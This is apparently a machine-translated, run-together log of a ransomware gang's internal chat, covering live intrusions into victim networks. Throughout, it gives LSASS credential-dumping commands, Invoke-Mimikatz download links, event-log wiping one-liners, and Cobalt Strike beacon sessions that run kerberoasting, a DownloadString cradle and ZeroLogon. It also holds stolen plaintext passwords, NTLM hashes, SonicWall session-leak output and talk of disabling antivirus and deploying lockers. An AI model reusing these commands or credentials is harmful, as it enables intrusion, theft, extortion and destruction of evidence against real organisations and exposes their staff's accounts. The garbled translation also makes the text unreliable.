defender is sure to fuck up such an injection hook and is much more productive with hooka got it, it's clear enough if you're lucky in a day or two remove the password from the dumpdump then there plug in the key to vdigest and sit back and wait look where your man goes most often, If you need a password by cleartext I would do it this way but it will disappear if the user leaves. The principle is the same if you put the key on the vdigest and wait for the user to log in - cleartext pass will be in the lss memory when you have to reboot in cis32 and then it also records all logging in but when it is injected, when a user logs in, the user's pass logs into the textam in order for your password to fall admin must enter ita Didn't you re-login when you used memssp? is there a cleartext pass falling to you right away?[ ](https://stylebrooks.com/group/discussion?msg=Qra2wRNbginGMesge) no, it's ok) maybe there's other software this hook can do more than just mimics without any dumps of lsas and will write them in text, then wham, and wait till everyone is re-logged. i asked, maybe there's a more legitimate way, it's death to unlogin admin) or it's an inject to rewrite completely (in fact we came to the same thing)
put the dongle in the register, unlock it and wait
when the lsass dumps comes in, remove it, i think it will be more safe than with the injectorPlus to intercept the cache you have to wait for the user to log in
the injector there is fucking dirty by default) it's an injector to intercept the cache from the wdigestoran, you shouldn't have done that
it's not a dumpy read on memsspd I've injected it and got it all)in server 12 and 16 you'll get the same hash if you don't plug in wdigest[ ](https://stylebrooks.com/group/discussion?msg=dGJqSBgsfkkmHtm9n) in the ten lssass does not store passwords in plain sight then you stick vdigest on the host where the admin goes, unlogin him and wait and need only inject lssass)) password may be one of the admin, and I do not have them, to hash, say I have a bakup software, on the password you can enable through the hash and walk through it you do not always need a password cleartextom more this password can be not only on the account of the administrator and also where else will fit, korochki need cleartextom brute force?but brute force, there are passwords Ecx8$U*mn<[CD)G\==and if he got out, his account may not be in lasas, projektil and wait, the user logged in and it just entered the text yes as a variant through the registerdigest null because it needs to be enabled separatelysince it is clear with you these are service accounts for spn and kerberos* Username : mccadmin
       * Domain : OPTECH
       * NTLM :
       * SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f
       [00010000] CredentialKeys
       * NTLM :
       * SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f
      tspkg :
      wdigest :
       * Username : mccadmin
       * Domain : OPTECH
       * Password : (null)
      kerberos :
       * Username : mccadmin
       * Domain : OPTECH.LOCAL
       * Password : (null) Watch the fucking example, what's this got to do with the local service, anywayUsername : OPT-CORP-DC-01$
What's this? [00000003] Primary
       * Username : OPT-CORP-DC-01$
       * Domain : OPTECH
       * NTLM : 591f790562e7f99d27dd870930fecdb7
       * SHA1 : c9b9e72ca2feb38411e67834ec07c026a18dd791
      tspkg :
      wdigest :
       * Username : OPT-CORP-DC-01$
       * Domain : OPTECH
       * Password : (null)
      kerberos :
       * Username : opt-corp-dc-01$
       * Domain : OPTECH.LOCAL
       * Password : (null) Fuck, you can't do anything like in the examples above and you can send me the hashes and I'll give them to the brutts.
because this is User Name : LOCAL SERVICE
Domain : NT AUTHORITY[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=fqBSRP3ib4dprsZqP) +is an example of simplicity when you inject into Lsass you get the same as when you dump the memory
Greetings. On the updated W10 and WServer2019, this feature "misc::memssp" no longer works.
After its launch, Windows goes into reboot immediately. He writes that there is a problem and needs to reboot. Tested on more computers.
In general, can it be fixed somehow?
``It's pretty much null by default, tell that to 10k and its server versionmay it not bother you that this is a local service? Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 3/14/2021 4:49:43 AM
SID : S-1-5-19
      msv :
      tspkg :
      wdigest :
       * Username : (null)
       * Domain : (null)
       * Password : (null)
      * kerberos :
       * Username : (null)
       * Domain : (null)
       * Password : (null)
      ssp : starting with server 2012 and win 8.1 wdigest is disabled under wdigest?there will be the same as in the live dump and with the hash you can not log in by rpvsm zulenolol, and there passwords are all zulenolenny you reinvent the wheel need just dump lsass and all lolvariants to work with getting credentials two, this is one of the options, the second is dipping mimilib into the folder system32, using the right command and reboot, allows you to write the credentials into the txt, but mimilib firewall and in cis32 will fire for sure, it would be quiet if it was not firewalled, I do not know if you need a static or randomprivilege::debug
misc::memsspmimikatz misc::memsspmimspp The above is a logopassword in any case either vinapi or something else is involved[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=Bby9uZL9qAnHbL2Hd) tell me the name of the command you want to run in mimic and crypto won't help you
crypt is static, the method of injection doesn't change over timeaah you probably don't know what i mean, ok the first way is more dangerous than the second you either inject live and look at the memory lsass
or take a dump and look locally in your room what you've thrown at him how to dump the lsassnoozhnu apparently crypt dll and ehashnika so without mimicry above tossed variants)with mimic psh not do takoenu so we're you about what we're writing here) in tekstovik) that would get all logged in lsasstask manager, prokdump sure stray, but not all AV I aim hard if there rdp through the task manager quietest will be, I thinkIf you have a lsass dump, it will be the quietest thing to do, I think:
```
Dumping lsass without mimicatz
	2.
		2.1 Create a minidump of the lsass.exe using task manager (must be running as administrator): open Task manager by Administrator
		2.2. find lsass.exe
		2.3. right click on lsass.exe
		2.4. choose Create Dump File (you will see path to dump, f.e. it is "C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP")
			[2.5. switch to mimikatz
							> sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
							> sekurlsa::logonpasswords]
	-
	3. procdump
		3.1. cmd.exe > procdump.exe -accepteula -ma lsass.exe lsass.dmp
		//or avoid reading lsass by dumping a cloned lsass process
			cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
	-
	4. comsvcs.dll
		4.1. .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
	-
	??5. ProcessDump.exe from Cisco Jabber
``There is a slightly modified version for especially hard ABs
default dumper is not fud, in static at least, not dropdown to disk on dotnet as I recall
dumpertwin defender (even for lsass dumps) but NOT obfuscated stinks badly try to take pawershelf mimic - here you may download it ```.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
```
different in volume, I don't know why
and try to obfuscate there are ps obfuscators[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=hGGZc6EzTxzxTcdCJ) as an option, you can use Invoke-Mimikatz.ps1, and replace the keywords there with your own, a lot of averov statically steal the word mimikatz (I do not claim, but read about it) have any crypto mimikat?i can replace ²sassui with other servers, such as fs or kdo look at the attribute logonCount in ADparalyat at once all the fuckin' popeasuyutabayut admins go to 24 hours and there is no there often go i think it all depends on the specific case and the case for the most part. how often admins generally go to servers? who knows? What is the likelihood that, for example on the shul servak will enter the administrator in the working day? Codeneconnect your account to the office on the deck and dump everything ... so there's like office365Men who worked with ovh.com; export a box or migration of history on another server interestsdzhudponalya know setyat more he already received, and I do notprivet, and when we and Alex and mlsf give deediki and servers under the msf? We are waiting for aha thanks)-rtt means recursion (r), and a command to pack by date of change (tt)
normally everything is packaged with recursion to properly archive the folder
again, `-tt` is FROM a given date, `-t` is BEFORE a given date-command -rt is recursive, but what would be without recursion should be written without r in -rtt that is -rt. it is clear that mush is not clear, where the error in the command or description?
ZIP FILES BY DATE OF CHANGE
zip -rt 2018-01-01 C:\Programdata\zip.zip C:\users\admin\Documents\ - packs recursively (without recursion, remove r in -rt) all files in Documents folder to zip.zip archive before specified date, ie it will download all documents before 2018, older do not take
If by any reason it is necessary from 2018,then write -rtt (if without recursion just -tt)
``+hz, maybe everyone already knew this but me, but still:
the task was to run a shairfinder from a non-domain car(dedicatee) via wpn, solved by calling the pvershell via ran s,
```
runas /netonly /user:domain.local\user powershell
```
and from there shairfinder, the output is there, use it at your pleasure
By the restPars, does anyone have problematic cases - taken YES, but there is no way to break through because of the AV ? In particular sofos. Draughts in private, have an idea how to solve the inside of the script probably need to enter the domain instead of None who yukal https://github.com/Yt1g3r/CVE-2020-0688_EXP
there is a problem with the execution, the authorization gives the correct, but then the error, who encountered? pm@kalinka fixed sofos like this option, did not work in extreme cases[ ](https://stylebrooks.com/group/general?msg=2MNvAuFf3HxmhQ6iZ) tried? in 2 cases tested - no cooze and it's not afraid of avsam reboot pknado lokera functionality as revil heard there, it is registered in the reboot, in safe mode and locosofos handpoint can be knocked out by pvsh script, but you need to reboot me now there is a grid here italy, and here sofos on password too, i found a panel, but i do not understand the fuck out of it. i dont know if it's the same or not. i thought i could paiload and lock.@Shved but if the koba crypt and spread paiload and then dll lock, why not an option?:muscle:thanks, so will do) find some quiet servers and drain them.hello everyone. Who can help with the grid lock? The rights are up, the data is pumped out. Main domain(175serv online) + 2 trusts(~40serv online). The problem is that there are sofos with password everywhere. Finding the passcode from sofos is not possible. Any changes in sofos settings are restricted, the maunty lock will not work, although the cars without AB is. Need a man who can cut / stop sofos. Otpisit in pm, who knows how to fight sofos.me at any time, but it is recommended at night. at your own riskvshey all hello! clue me, the date usually put the drain during working hours on the grid or at night? if there just need to activate cheto no problem shops, banks are sure palyatatse who palyat* google voz like palyatam straight under the state can choose a number google voziteVice very necessaryPriest
Does anyone have an option for a permanent sim card in the US to take a few sms? Activator mb in contacts + is VERY important in terms of getting access@all TO ALL, urgently.
Within two days in networks where you work with the rights and where there is an exeChenge check whether vindef on these exeChenge servers@all call me in the confab please, where you need builds lockershttp://rmusser.net/docs/Active_Directory.html@all 209.222.97.78 - whose grandfather? don't connect to him@all laurent-perrier.fr don't see the case thisjask[ ](https://stylebrooks.com/group/general?msg=6hvXr8S7ES64vC8qH) on the git in the manual says what could be easier
python -m pip install
but simpler could be
python -m pip install impacket from the downloaded release folder, not the master branch

It may complain next that there is no readline module
pip install pyreadline

and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing)
it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windowsимпакет not installed. what is your problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chachhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? or maybe someone has a way to get the info fast ?wanted to netsapp therein palyfakt dlltut still in progress what's up ? @giovannielefant in the wrong channel threw the man just = )ahahahhapriet - goodbye ? :D hellohelloworld123 hellohelloworld123 hello go to the group all hello ! when will we start raping mubey ?
CMD5 Email: arsahgg314@yandex.com
Password: faA3g$^@fdzf@4
Try and bypass the VPN requirements by specifying the domain on the machine you connect frominvpntax it didn't connect here how do you do ?kkpost on brut plz
```
8f52c41fd02ce50f07ccff44c8fef870
1811bb3f06f3f07b9f15d27afbe60bcc
6af6c6b11d776531653150238b93b7ee
06cbf8ea1fcbfcfd75582ccd18fbff6e
7dacfa3217f1ebdbfc95b94c02ba8965
4d28221cf81af229e8b44207b92c4df5
46a256f5607225eaf22cb7099a02c079
a2d2d89a377e4b1e079adecb5bfd71e0
c57f3d5f1cf656fe45a6d5142ddafc10
``If it's not hard to check this one more 80fe4359c69cbf41f2b46b620533dc6d have you been able to scrub?
cmd5.org can't takevampiru steven had a workout@all hi gentlemen. If memory serves me right, someone here has rklon from memory share info how and what ?@all who has a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can still do so:
``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1"
``````
Cleaning Logs

1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them.

Get-EventLog -LogName *


2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop:

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }


3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time.

To display a list of logs registered in the system, run the command:

WevtUtil enum-logs

Clearing events in a particular log is done as follows:

WevtUtil cl Setup

Before clearing, you can back up the events in the logbook by saving them to a file:

WevtUtil cl Setup /bu:SetupLog_Bak.evtx

To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them:

Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName }

or like this

Wevtutil el | ForEach { wevtutil cl "$_"}


4 Log clearing can also be done from the classic command line:

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"


Log Cleaner Batnick

PHP:
 
break>"%CD%\server_log.txt"

break>"%CD%\logs\errors.log"
break>"%CD%\logs\log-core.log"
break>"%CD%\logs\warnings.log"
break>"%CD%\logs\plugins\mysql.log"


Clear all Windows Event Viewer logs
1. CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

2. powerShell
 Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
``@@all eataly.com was once a long time ago such a res, please tell me who localized it) @slice aren't you by any chance? @t3chnolog ?[ ](https://stylebrooks.com/group/general?msg=AoceiT5ePNBEQeFbk) no root there pomoyu, it is always emptyVMware vcenterhyper-v? guys, has anyone decrypted root passes from vim base to hypervisors?the same or not commands take 5-15 minutes to execute disconnect sonic and check packet loss, unstable connection to the tim sevrverdono however, when i reconnected via posh, lag began only when i vpnku on sonic raised on nemya already reconnected via posh, the same shit99rdp addicts from amazon? and as ran excelshot on the new addic, the server begins to fiercely stupid guys, have you encountered problems?
 - I've got a new deck.
 - configured the exe file
 - ran it on the new dedic
 - The dead disk appeared in the cob
 - any commands in bacon are executed by 5-15 mindump with cmtp???? :face_with_monocle:outluckily make a dump of the mail from the smtp server, on the credentials, what software besides Thunderbird can be used? ``execute-assembly /home/user/txt/edu/Fast-Guide/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
``Thank you, I'll check it manually,`` use rubus in the manual from the forum, I'll write back, it won't start via execute-assembly for some reason, then this is a rubus script, but should I put a link to rubus from githab in DownloadString?
powershell.exe -exec Bypass -C "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://
```
you get it)``.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
```
and put this parameter in front of IEX DownloadStringtry without importing it from github I thought verashell imports it directly into memory so psingectin works I wonder why it tries to download it from the localhost via a downloaded string is it not rubus? ``beacon> powershell-import D:\therOther\Invoke-Kerberoast.ps1
[*] Tasked beacon to import: D:\Other\Invoke-Kerberoast.ps1
[+] host called home, sent: 12760 bytes
beacon> psinject 2384 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 into 2384 (x64)
[+] host called home, sent: 134785 bytes
[+] received output:
ERROR: DownloadString : Exception calling "DownloadString" with "1" argument(s): "An exception occurred du
ERROR: ring a WebClient request."
ERROR:
ERROR: At line:1 char:46
ERROR: + IEX (New-Object Net.Webclient).DownloadString <<<< ('http://127.0.0.1:8206/'); Invoke-Kerberoast
ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin
ERROR: g UTF8
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: Invoke-Kerberoast : The term 'Invoke-Kerberoast' is not recognized as the name of a cmdlet, functio
ERROR: n, script file, or operable program. Check the spelling of the name, or if a path was included, ver
ERROR: ify that the path is correct and try again.
ERROR:
ERROR: At line:1 char:91
ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8206/'); Invoke-Kerberoast <<<<
ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin
ERROR: g UTF8
ERROR: + CategoryInfo : ObjectNotFound: (Invoke-Kerberoast:String) [], CommandNotFoundExcept
ERROR: ion
ERROR: + FullyQualifiedErrorId : CommandNotFoundException
ERROR:
``Hi, guys no one faced, starting rubus script gives out:Guys, why can proxy in koba not start? I added a dedicce to the cob, PKM - pivoting - socks server - launch
I can't always see it in proxy pivots but it is almost always broken.
Does the dll injector from under kaspersky work? Or does it work ?here are all valid Sregel Porkchop2020!
jforrest MNHY7ujm
cmiklos gUBA40*r
kmanoatl PortCity22124#
bgrishkat SecondGirl$18
msallada P@mAm@nd@6
bstaudt Zelda22!
bsirstins !Dunno55www
grouse HaleyBug20!
rwalker banBMWin2017!@
for vorks up there differentdth[e nfv hfpyst give me a login pass? so what you hooked a creed not a bad percentage of 10-15 percent gets through workinghf,jxfzna how much is this working topic by the way zerologon not tried here apparently vorks are offnu normcervaks pingedcthdfrb gbyue.ncz so everyone is watching no pings at allvpn tonoch work the only working sonic crudes have 13 days to livekready'.\Administrator:Sysadmin1' Administrator What token to get on the vorks on this pidtut if we get to put a clipokdavay evening will see what to do with them so need help) do not pull anything out of them I can not leave three vork logged in case the vpn will fall off ``[+] 101.1.10.43:445 - 10.1.10.43:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.32:445 - 10.1.10.32:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.40:445 - 10.1.10.40:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.44:445 - 10.1.10.44:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.66:445 - 10.1.10.66:445 - Success: '.\Administrator:Sysadmin1' Administrator
[+] 10.1.10.67:445 - 10.1.10.67:445 - Success: '.\Administrator:Sysadmin1' Administrator
This is a new krypt on monday i got a new krypt on Monday so i dont know how to start it but i just want to give it a go and try to add the domain, maybe it will work
[-] 192.168.1.56:445 - 192.168.1.56:445 - Failed: '.\Administrator:Sysadmin1',
``failed to sysadmin on the servers looked under the domain it locale?directly on the controllergachekni smb login5fa7b5f9c23a16c0f9644cb907c85a95 Sysadmin1Sysadmin1 913147b3d5a680ae41f23b1d2bf1f293da wait ``DVK0HQ2\eisadmin 5fa7b5f9c23a16c0f9644cb907c85a95
DVK0HQ2\Guest 31d6cfe0d16ae931b73c59d7e0c089c0
DVK0HQ2\DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0
DVK0HQ2\WDAGUtilityAccount 42da01550980089a444a5899ac6a053d
DVK0HQ2\Administrator 913147b3d5a680ae41f23b1d2bf1f293
``[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 2743 bytes
[+] Impersonated NT AUTHORITY\SҮTSTEMKER: Need help ``beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 264391 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
[+] received output:
getsystem failed.
[+] host called home, sent: 12 bytes
beacon> inject 912 null https_spotver
beacon> sleep 2
[*] Tasked beacon to sleep for 2s
[+] host called home, sent: 16 bytes
beacon> hashdump
[-] this command requires administrator privileges
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
[-] Could not connect to pipe: 2
beacon> execute-assembly C:\soft\SharpChrome\SharpChrome.exe logins /showall
[*] Tasked beacon to run .NET program: SharpChrome.exe logins /showall
[+] host called home, sent: 930377 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
beacon> execute-assembly C:\soft\Net-GPPPassword\Net-GPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
beacon> execute-assembly C:/soft/Seatbelt/Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
[*] Tasked beacon to run .NET program: Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
[+] host called home, sent: 652435 bytes
[-] could not spawn C:\WINDOWS\system32\wusa.exe: 740
``but I don't know what to do next on the rdp I disabled sofos, session in the coboo got binary jumped ``[+] 10.1.10.50:445 - 10.1.10.50:445 - Success: 'EIS\Sregel:Porkchop2020!!!' Administrator
[+] 10.1.10.32:445 - 10.1.10.32:445 - Success: 'EIS\bgrishkat:SecondGirl$18' Administrator
[+] 10.1.10.40:445 - 10.1.10.40:445 - Success: 'EIS\bstaudt:Zelda22!' Administrator
``busted beacon> execute-assembly C:\softsoftsoft macafee sofos and sentinelchuvak turned out to be an admin on the same vorkjecto here? @alter in which confab you threw your zerologon?
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe EIS2019DC.eis.local
[+] host called home, sent: 114257 bytes
[+] received output:
Performing authentication attempts...

[+] received output:
Unable to complete server challenge. Possible invalid name or network issues?
``Servers on ms17 are invulnerable and their self-servers are 2008 with creeds in the sense of jumping on the sevens to poryaday zerologon and 17-010 on the sevens `` well I'll take hell off`` ``.
[+] 192.168.1.66:445 - 192.168.1.66:445 - Success: 'EIS\Sregel:Porkchop2020!
i got through to them @alter @steven any idea how to start it let's say i uploaded some binary what to do with it i don't fucking know what to do here in the bookmarks like i have access to the fileshare of the server so i can't see the hrd i look after web authorization there is no hrd anywhere ?it sends some other codes to the mobile app usa it does not accept backups codes go check the domain admin
[+] Checking URL https://66.208.26.12
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.7-22sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://66.208.26.12
      [+] Found: SessionID: 11EX0qbJxgw0oxHnmy8JIVMXF1odMPLZFVNyyWT1MFU= userType: 1 userName: Sregel Password: Porkchop2020!! Domain: EIS
      [+] Found: SessionID: 2r22NuGvDeRcTXKEOr7AUjcQ0spvbucbZgRBv1071VU= userType: 1 userName: jforrest Password: MNHY7ujm Domain: EIS
      [+] Found: SessionID: D1KJjvBfSbYKdu614Kc0ZQuYTlI0wzS1xpN5jF9colg= userType: 1 userName: cmiklos Password: gUBA40*r Domain: EIS
      [+] Found: SessionID: GyTuUXiZLbVonpbsD31qB4QCHpkxI11xEyaiVx1ACTQ= userType: 1 userName: kmanoatl Password: PortCity22124# Domain: EIS
      [+] Found: SessionID: J9A0EFXfl4HAkj00LeK56DLLxu6YFoUrquKEMQVZc0A= userType: 1 userName: bgrishkat Password: SecondGirl$18 Domain: EIS
      [+] Found: SessionID: OuD0WnJK95pmxOGglFsh5dXpiKHHVWRl1pdERQnh7kc= userType: 1 userName: msallada Password: P@mAm@nd@6 Domain: EIS
      [+] Found: SessionID: UsAfbc265IgQmX49C3rPjgV1flhWkKeWBausk5HaL5U= userType: 1 userName: jpontzer Password: $KroKoo88KwoKoo Domain: EIS
      [+] Found: SessionID: bkt4BQbR111l1TMf9b8RQYDhtOrpFY0jILCuneZeCGE= userType: 1 userName: bstaudt Password: Zelda22! Domain: EIS
      [+] Found: SessionID: j9vcC7JOBCvr5VJgKocfEk5hMZlPbO5Pe7PQslj5Bj4= userType: 1 userName: bsirstins Password: !Dunno55www Domain: EIS
      [+] Found: SessionID: mr5HXc4QAy1Hz6fwcuCWXI9UlN1zk7ozS8Ac1G0akaw= userType: 1 userName: grouse Password: HaleyBug20! Domain: EIS
      [+] Found: SessionID: oXcf0mbsYkyHFpNx336zW7RwlaQUmbXp7MPFHW0jfC4= userType: 1 userName: jgoda Password: Pragti(82)@jg Domain: EIS
with these sonics there's only one thing wrong with them, I'm going to try to retrieve the codes right now@alter I have to retrieve them, but all the sessions are dead, the usual 2fa with backup codes, what coba do you have, can I help you?vampiralterda ok, i'll get it right away@stakan take it for yourself right awaytakapAU Fucking 2 months this case lasts? have you looked? yes, i will do so from the looks of it so why not just take a separate folder listing and delete any other gui shredder? all with the past!
hint, making a log of the deletion of the date, run the command
``erase /F /S /Q E:\FTP\targetname >> erase_all.txt```

because there are files with too long paths
the command gets interrupted with an error like "file path is too long".
I found a thread on stackoverfall with a similar problem, it was advised to make a mapping folder and apply the delete command to the linked folder.
I did it, everything was deleted, but the log of the deleted files was not saved

advise, mb someone already faced with this, how to solve? thank you very much give a list of avs that palyat, please dll*LLVM exe 5/23msvs x64 4/23llvm x64 was 2/23pm can someone dincheck? thanks)oh cool@all updated artifact, it was cleaned otherwise the sameBest Case Bankruptcy program opens the client base with this extension. I don't know if anyone can use it. Happy Victory Day to everybody! Happy Victory Day! :handshake:Happy Victory Day! :thumbsup: :thumbsup: :thumbsup:.)
Happy Victory Day to all comrades)Happy Victory Day, gentlemen! 2020-2021 Ransom - repeat :))Happy Holidays to all! proton gives you to register if sox normal btw. such as with lux lux extra wedge +1 to karma)[ ](https://stylebrooks.com/group/general?msg=yEHSkuvicFssvNEWc) account should be called by a normal name, without firms and so on and originally should react with a clean ip, then at least with what come zahpishu write them that I am a decent type and did not violate, but no response so far)it is true, but there is one but)I incidentally proton once registered for 10 minutes e-mail, there was a code and I normally zagoregalitutanota normal?
where is the best place to get anonymous emails?
Proton began to fuck my head with registration (i updated java, the most interesting thing i restart without closing the first window, and it opens correctly at the top of the first window.
4.3 does not work so what version of java? I start with a wind-up server, ehashnikwas, I changed pps and normal)) All shalom!
Who has run into this? @terner write in PMhuy holiday):partying_face::fireworks:Happy Encryptor Day all) :Dah, well, I thought something else) ipi will change, and the hostname is notLS1818.dkengr.coma what is the hostname?
if the host of the employee, then you have to remember the host name, not if the host is now offline and its ip is busy? when the host goes offline its ip is taken by another host, the distribution by DHCP
but since the dns entry points to some ip, it is pinged, so you have such a hat happensDHCPHello all, colleagues here is the situation:
there is a YES and his car iris_borra LS181818
When pinging the hostname
```

Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data:
Reply from 10.1.20.15: bytes=32 time=18ms TTL=127

Ping statistics for 10.1.20.15:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 18ms, Maximum = 18ms, Average = 18ms

```
and users
```
 Directory of \10.1.20.15\c$\users

09/03/2019 03:05 PM <DIR> .
09/03/2019 03:05 PM <DIR> .
09/03/2019 02:51 PM <DIR> dkuser
12/06/2020 03:13 PM <DIR> iris_borra
10/30/2019 09:44 PM <DIR> public
               0 File(s) 0 bytes

```
some time later
```
shell dir "\\10.1.20.15\c$\users\\iris_borra\Downloads\"
[*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users\\iris_borra\Downloads\"
[+] host called home, sent: 80 bytes
[+] received output:
The system cannot find the path specified.

shell dir "\\10.1.20.15\c$\users"
[*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users"
[+] host called home, sent: 58 bytes
[+] received output:
 Volume in drive \10.1.20.15\c$ is OS
 Volume Serial Number is 52A8-6845

 Directory of \10.1.20.15\c$\users

06/26/2020 03:16 PM <DIR> .
06/26/2020 03:16 PM <DIR> .
05/31/2019 03:03 PM <DIR> administrator
05/31/2019 02:50 PM <DIR> dkuser
03/16/2021 08:40 AM <DIR> paul_munoz
04/26/2019 03:21 PM <DIR> public
11/29/2020 09:06 PM <DIR> Wendy_Munoz

```
and the polzak just disappears from the car, on another ping:
```
Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data:
Reply from 10.1.20.15: bytes=32 time=13ms TTL=127

Ping statistics for 10.1.20.15:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 13ms, Maximum = 13ms, Average = 13ms

 Directory of \10.1.20.15\c$\users

06/26/2020 03:16 PM <DIR> .
06/26/2020 03:16 PM <DIR> .
05/31/2019 03:03 PM <DIR> administrator
05/31/2019 02:50 PM <DIR> dkuser
03/16/2021 08:40 AM <DIR> paul_munoz
04/26/2019 03:21 PM <DIR> public
11/29/2020 09:06 PM <DIR> Wendy_Munoz

```
When querying through the hostname
```
shell dir \LS1818.dkengr.com\c$\users
[*] Tasked beacon to run: dir \\LS1818.dkengr.com\c$\users
[+] host called home, sent: 63 bytes
[+] received output:
Logon Failure: The target account name is incorrect.

```
anyone encountered this? how is it cured? Truly work rans! Mutual! Happy holidays to all!!! Happy May Day, gentlemen!
